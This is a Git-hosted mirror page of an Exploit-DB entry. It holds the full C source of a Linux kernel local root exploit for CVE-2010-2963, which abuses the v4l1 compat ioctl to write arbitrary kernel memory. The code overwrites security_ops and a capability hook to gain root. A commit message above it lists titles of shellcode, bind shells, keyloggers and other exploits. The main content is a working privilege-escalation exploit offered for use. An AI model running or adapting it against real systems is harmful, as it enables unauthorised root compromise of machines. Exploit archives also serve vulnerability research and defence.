bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/local/15344.c
Offensive Security 2a57bee5c6 DB: 2016-07-25 
12 new exploits

Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit
Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Exploit

Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service

FreeBSD/x86 - /bin/cat /etc/master.passwd NULL free shellcode (65 bytes)
FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes)

Linux/x86 - execve shellcode null byte free (Generator)
Linux/x86 - execve Null Free shellcode (Generator)

Linux/x86 - cmd shellcode null free (Generator)
Linux/x86 - cmd Null Free shellcode (Generator)

iOS - Version-independent shellcode

Linux/x86-64 - bindshell port:4444 shellcode (132 bytes)
Linux/x86-64 - bindshell port 4444 shellcode (132 bytes)

Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) NULL Free shellcode (39 bytes)
Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes)

Windows 5.0 < 7.0 x86 - null-free bindshell shellcode
Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode

Win32 - telnetbind by Winexec shellcode (111 bytes)
Win32 - telnetbind by Winexec 23 port shellcode (111 bytes)

Windows NT/2000/XP - add user _slim_ shellcode for Russian systems (318 bytes)
Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes)
Windows XP Pro SP2 English - _Message-Box_ Shellcode Null-Free (16 bytes)
Windows XP Pro SP2 English - _Wordpad_ Shellcode Null Free (12 bytes)
Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes)
Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes)

Linux/x86 - /bin/sh Null-Free Polymorphic Shellcode (46 bytes)
Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes)

Win32 - Add new local administrator shellcode _secuid0_ (326 bytes)
Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes)

ARM - Bindshell port 0x1337shellcode
ARM - Bindshell port 0x1337 shellcode

Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite

Linux Kernel <= 2.4.0 - Stack Infoleaks

bsd/x86 - connect back Shellcode (81 bytes)
FreeBSD/x86 - connect back Shellcode (81 bytes)

Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.10/11.04) - Privilege Boundary Crossing Local Root Exploit
Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit

Linux Kernel 2.0 / 2.1 - SIGIO
Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process

Linux Kernel 2.2 - 'ldd core' Force Reboot

Debian 2.1_ Linux Kernel 2.0.x_ RedHat 5.2 - Packet Length with Options
Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options

Linux Kernel 2.2.x - Non-Readable File Ptrace
Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak

OS X 10.x_ FreeBSD 4.x_OpenBSD 2.x_Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure
OS X 10.x_ FreeBSD 4.x_ OpenBSD 2.x_ Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure

Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (1)
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (2)
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (1)
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (2)

Linux Kernel 2.4 - suid execve() System Call Race Condition PoC
Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept

Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling
Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read

Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure

Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities
Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities

Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities

Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)

Linux/x86 - Reverse TCP Bind Shellcode (92 bytes)
Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)

Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow

Linux/x86-64 - Bind TCP port shellcode (81 bytes / 96 bytes with password)
Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password)

Linux/x86 - TCP Bind Shel shellcode l (96 bytes)
Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes)

Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation
Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation

Windows x86 - user32!MessageBox _Hello World!_ Null-Free shellcode (199 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes)

OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)
OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes)

Mainframe/System Z - Bind Shell shellcode (2488 bytes)
Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)

OS-X/x86-64 - tcp bind shellcode_ NULL byte free (144 bytes)
OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes)

Ubuntu Apport - Local Privilege Escalation
Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation

Linux/x86-64 - Bindshell with Password shellcode (92 bytes)
Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes)

Windows XP < 10 - Null-Free WinExec Shellcode (Python) (Generator)
Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)
Linux/x86-64 - bind TCP port shellcode (103 bytes)
Linux/x86-64 - TCP Bindshell with Password Prompt shellcode (162 bytes)
Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes)
Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes)

Windows x86 - Null-Free Download & Run via WebDAV Shellcode (96 bytes)
Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)

Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption
Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption

Windows - Null-Free Shellcode Primitive Keylogger to File (431 (0x01AF) bytes)
Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)

Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)
Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow)

Windows - Null-Free Shellcode Functional Keylogger to File (601 (0x0259) bytes)
Windows - Functional Keylogger to File Null Free Shellcode  (601 (0x0259) bytes)

Linux/x86-64 - Null-Free Reverse TCP Shell shellcode (134 bytes)
Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)

Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)

Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes)
Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
2016-07-25 05:06:19 +00:00

211 lines
5.3 KiB
C
Executable file
Raw Blame History

// source: http://www.securityfocus.com/bid/44242/info
/*
* CVE-2010-2963
* Arbitrary write memory write via v4l1 compat ioctl.
* Kees Cook <kees@ubuntu.com>
*
* greets to drosenberg, spender, taviso
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include "exp_framework.h"
#include <stdint.h>
#include <string.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <linux/videodev.h>
#include <syscall.h>
#include <sys/capability.h>
struct cap_header_t {
uint32_t version;
int pid;
};
#define DEVICE "/dev/video0"
struct exploit_state *exp_state;
char *desc = "Vyakarana: Linux v4l1 compat ioctl arbitrary memory write";
int requires_null_page = 0;
int built = 0;
int super_memcpy(unsigned long destination, void *source, int length)
{
struct video_code vc = { };
struct video_tuner tuner = { };
int dev;
unsigned int code;
char cmd[80];
if (!built) {
FILE *source;
char *sourcecode = "/*\n\
* CVE-2010-2963: Write kernel memory via v4l compat ioctl.\n\
* Oct 11, 2010 Kees Cook <kees@ubuntu.com>\n\
*\n\
*/\n\
#define _GNU_SOURCE\n\
#include <stdio.h>\n\
#include <stdlib.h>\n\
#include <stdint.h>\n\
#include <unistd.h>\n\
#include <sys/types.h>\n\
#include <sys/stat.h>\n\
#include <fcntl.h>\n\
#include <string.h>\n\
#include <sys/ioctl.h>\n\
#include <sys/mman.h>\n\
#include <assert.h>\n\
#include <malloc.h>\n\
#include <sys/types.h>\n\
#include <linux/videodev.h>\n\
#include <syscall.h>\n\
\n\
#define DEVICE \"/dev/video0\"\n\
\n\
struct video_code32 {\n\
char loadwhat[16];\n\
int datasize;\n\
int padding;\n\
uint64_t data;\n\
};\n\
\n\
int super_memcpy(uint64_t destination, void *source, int length)\n\
{\n\
struct video_code32 vc = { };\n\
struct video_tuner tuner = { };\n\
int dev;\n\
unsigned int code;\n\
\n\
if ( (dev=open(DEVICE, O_RDWR)) < 0) {\n\
perror(DEVICE);\n\
return 1;\n\
}\n\
\n\
vc.datasize = length;\n\
vc.data = (uint64_t)(uintptr_t)source;\n\
\n\
memset(&tuner, 0xBB, sizeof(tuner));\n\
\n\
// manual union, since a real union won't do ptrs for 64bit\n\
uint64_t *ptr = (uint64_t*)(&(tuner.name[20]));\n\
*ptr = destination;\n\
\n\
// beat memory into the stack...\n\
code = VIDIOCSTUNER;\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
\n\
code = 0x4020761b; // VIDIOCSMICROCODE32 (why isn't this VIDIOCSMICROCODE?)\n\
syscall(54, dev, code, &vc);\n\
\n\
return 0;\n\
}\n\
\n\
int main(int argc, char *argv[])\n\
{\n\
uint64_t destination = strtoull(argv[1], NULL, 16);\n\
uint64_t value = strtoull(argv[2], NULL, 16);\n\
int length = atoi(argv[3]);\n\
if (length > sizeof(value))\n\
length = sizeof(value);\n\
return super_memcpy(destination, &value, length);\n\
}\n\
";
if (!(source = fopen("vyakarana.c","w"))) {
fprintf(stderr, "cannot write source\n");
return 1;
}
fwrite(sourcecode, strlen(sourcecode), 1, source);
fclose(source);
if (system("gcc -Wall -m32 vyakarana.c -o vyakarana") != 0) {
fprintf(stderr, "cannot build source\n");
return 1;
}
built = 1;
}
printf("Writing to %p (len %d): ", (void*)destination, length);
for (dev=0; dev<length; dev++) {
printf("0x%02x ", *((unsigned char*)source+dev));
}
printf("\n");
sprintf(cmd, "./vyakarana %lx %lx 8", (uint64_t)(uintptr_t)destination, *(uint64_t*)source);
return system(cmd);
}
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
unsigned long default_sec;
unsigned long target;
unsigned long restore;
int prepare(unsigned char *buf)
{
unsigned long addr;
if (sizeof(long)!=8) {
printf("Not enough bits\n");
return 1;
}
printf("Reticulating splines...\n");
addr = exp_state->get_kernel_sym("security_ops");
default_sec = exp_state->get_kernel_sym("default_security_ops");
restore = exp_state->get_kernel_sym("cap_capget");
// reset security_ops
super_memcpy(addr, &default_sec, sizeof(void*));
// aim capget to enlightenment payload
target = default_sec + ((11 + sizeof(void*) -1) / sizeof(void*))*sizeof(void*) + (2 * sizeof(void*));
super_memcpy(target, &(exp_state->own_the_kernel), sizeof(void*));
return 0;
}
int trigger(void)
{
struct cap_header_t hdr;
uint32_t data[3];
printf("Skipping school...\n");
hdr.version = _LINUX_CAPABILITY_VERSION_1;
hdr.pid = 1;
capget((cap_user_header_t)&hdr, (cap_user_data_t)data);
return 1;
}
int post(void)
{
printf("Restoring grammar...\n");
// restore security op pointer
super_memcpy(target, &restore, sizeof(void*));
return RUN_ROOTSHELL;
}
Reference in a new issue View git blame Copy permalink